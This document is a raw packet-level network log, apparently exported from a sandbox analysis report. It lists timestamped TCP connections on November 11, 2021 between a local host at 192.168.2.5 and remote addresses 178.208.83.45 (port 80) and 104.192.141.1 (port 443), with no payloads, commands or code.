                                                                                                                                                                                Nov 11, 2021 12:27:11.935698032 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.935728073 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.935744047 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.935765982 CET4985080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:11.935767889 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.935794115 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.935812950 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.935820103 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.935832977 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.935852051 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.935868025 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.935883999 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.935905933 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.935920954 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.935937881 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.935954094 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.935970068 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.935986042 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.936067104 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.936079979 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.936105967 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.936122894 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.936167955 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.936184883 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.936225891 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.936235905 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.936302900 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.936320066 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.936335087 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.961285114 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.961323977 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.961342096 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.961421013 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.961457014 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.961544037 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.961565018 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.961627960 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.964490891 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:11.966520071 CET4985080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.592228889 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.592277050 CET4985080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.617382050 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.617475986 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.617670059 CET8049850178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.617765903 CET4985080192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.618755102 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.619676113 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.619884014 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.620016098 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.643731117 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.644524097 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.644742966 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.645102978 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.645176888 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.645209074 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.645236015 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.645261049 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.645277977 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.645313025 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.645339012 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.645587921 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.645620108 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.645632029 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.645647049 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.645659924 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.645687103 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.645695925 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.645721912 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.645737886 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.670300961 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.670347929 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.670373917 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.670399904 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.670424938 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.670428038 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.670453072 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.670480967 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.670485973 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.670501947 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.670506954 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.670516014 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.670530081 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.670535088 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.670546055 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.670557976 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.670577049 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.670685053 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.670711040 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.670737028 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.670741081 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.670768976 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.670773029 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.670793056 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.670795918 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.670813084 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.670824051 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.670840979 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.670851946 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.670871019 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.670880079 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.670902967 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.670926094 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.670953035 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.670979977 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.671037912 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.695492029 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.695528984 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.695611954 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.695696115 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.695792913 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.695852041 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.695867062 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.695940018 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.696010113 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.696038008 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.696063042 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.696064949 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:16.696089983 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.696122885 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.696149111 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.696180105 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.696197987 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.696223974 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.696254015 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.696270943 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.696372986 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.696399927 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.696414948 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.696440935 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.696510077 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.696537971 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.696599007 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.696619034 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.696729898 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.696755886 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.696772099 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.696844101 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.696902037 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.696928024 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.696954966 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.696969032 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.697026014 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.697052956 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.697077036 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.697159052 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.697189093 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.697215080 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.720614910 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.720648050 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.720720053 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.720746040 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.720793009 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.721103907 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.721132994 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.721246958 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.721362114 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.721482038 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.721512079 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.721606970 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.721798897 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.724221945 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:16.724332094 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:18.614811897 CET49855443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:27:18.614850998 CET44349855104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.615205050 CET49855443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:27:18.615798950 CET49855443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:27:18.615808964 CET44349855104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.692451954 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:18.693471909 CET4985680192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:18.717587948 CET8049854178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.717736006 CET4985480192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:18.718583107 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.718705893 CET4985680192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:18.719278097 CET4985680192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:18.719419003 CET4985680192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:18.719609022 CET4985680192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:18.719724894 CET4985680192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:18.744398117 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.744421959 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.744712114 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.744803905 CET4985680192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:18.744824886 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.744858027 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.744894981 CET4985680192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:18.744924068 CET4985680192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:18.747020006 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.747034073 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.747042894 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.747057915 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.747068882 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.747085094 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.747100115 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.747142076 CET4985680192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:18.747194052 CET4985680192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:18.770036936 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.770061970 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.770076990 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.770111084 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.770127058 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.770143986 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.770167112 CET4985680192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:18.770205975 CET4985680192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:18.770224094 CET4985680192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:18.772243023 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.772258043 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.772272110 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.772331953 CET4985680192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:18.772356033 CET4985680192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:18.772397995 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.772439003 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.772453070 CET4985680192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:18.772483110 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.772492886 CET4985680192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:18.772500038 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.772537947 CET4985680192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:18.772562981 CET4985680192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:18.772713900 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.772727013 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.772739887 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.772753954 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.772768974 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.772790909 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.772809029 CET4985680192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:18.772830963 CET4985680192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:18.772867918 CET4985680192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:18.795329094 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.795348883 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.795358896 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.795373917 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.795389891 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.795404911 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.795418978 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.795433998 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.795437098 CET4985680192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:18.795449018 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.795466900 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.795481920 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.795497894 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.795516014 CET4985680192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:18.797323942 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.797343969 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.797410965 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.797524929 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.797554970 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.797569990 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.797586918 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.797602892 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.797620058 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.797636032 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.797651052 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.797667027 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.797887087 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.797907114 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.797923088 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.797938108 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.797955990 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.797971964 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.797988892 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.798027992 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.798043966 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.798058987 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.798118114 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.798134089 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.798149109 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.798163891 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.820559025 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.820585012 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.820599079 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.820615053 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.820630074 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.820646048 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.820662975 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.820677996 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.820722103 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.820738077 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.820751905 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.820765972 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.822871923 CET8049856178.208.83.45192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.822983980 CET4985680192.168.2.5178.208.83.45
                                                                                                                                                                                Nov 11, 2021 12:27:18.940150023 CET44349855104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.940228939 CET49855443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:27:18.946084976 CET49855443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:27:18.946104050 CET44349855104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:18.949002028 CET49855443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:27:18.949018002 CET44349855104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:19.052958012 CET49857443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:27:19.052990913 CET44349857104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:19.053071022 CET49857443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:27:19.054474115 CET49857443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:27:19.054482937 CET44349857104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:19.121522903 CET44349855104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:19.121630907 CET44349855104.192.141.1192.168.2.5
                                                                                                                                                                                Nov 11, 2021 12:27:19.121629953 CET49855443192.168.2.5104.192.141.1
                                                                                                                                                                                Nov 11, 2021 12:27:19.121942997 CET49855443192.168.2.5104.192.141.1
